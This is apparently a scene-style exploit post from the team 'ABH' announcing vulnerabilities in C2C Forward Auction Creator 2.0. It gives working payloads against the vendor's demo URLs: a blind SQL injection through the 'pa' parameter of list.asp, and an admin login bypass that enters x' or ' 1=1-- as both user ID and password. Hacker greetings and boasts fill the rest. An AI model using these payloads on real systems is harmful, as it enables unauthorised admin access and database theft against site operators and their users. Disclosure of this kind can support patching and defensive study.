=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[~] Tybe: Multiple Vulnerabilities
[~] Vendor: http://www.etoshop.com/
[+] Software: C2C Forward Auction Creator
[+] infection: Multiple Vulnerabilities
[~] Version :2.0
[~] author: R3d-D3v!L
[+] TEAM: ABH 
[?] contact: X[at]hotmail.co.jp 
[-] 
[?] Date: 14.d3c.2ol3 
[?] T!ME: 04:54 am GMT 
[?] Home: abhsec.com
[^] 
[?]
===================================================================================== 
#C2C Forward Auction Creator 2.0 (MV) suffering from Multiple Vulnerabilities
=====================================================================================


[!] Exploit Already Tested ... on windows server 2008

[^] Error console:- Blind sql injection

 B2BForwardAuction/auction/asp/list.asp?pa=1'     <--vuln - 


[?] proof of concept : 1

http://www.etoshop.com/demo/C2CForwardAuction/auction/asp/list.asp?pa=1 and 1 =1 --true--

[?] proof of concept 2 authbypass :

    1- www.etoshop.com/demo/C2CForwardAuction/auction/casp/admin.asp
  
      (/) UserID : x' or ' 1=1--

      (\)Password : x' or ' 1=1--

[~]-----------------------------{(A.B.H)}----------------------------------------------------
# 
[~] Greetz tO:virus_jordan&&H@CK3R M!ND&SyrianooĦąĈkỉŋg&ĦǒĿǻkőẾŁếstorầ&NetikertyAsenet...etc ;
# 
[~] 70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # ;
# 
[~] special thanks :all soqor members & xp10 # ;
# 
[?] special SupPoRT : packet storm & 1337day & Maksymilian Arciemowicz  # ;
# 
[?]---> ((R3d D3v!L<---palestine phoneix--->JUPA<---aNd--->Devil ro0t)) #; 
# 
[~]spechial FR!ND: they all are spechials ;) #; 
# 
[~] !'M 4R48!4N 3XPL0!73R. #; 
# 
[~](>D!R 4ll 0R D!E<) #; 
# 
[~]---------------------------------------------------------------------------------------------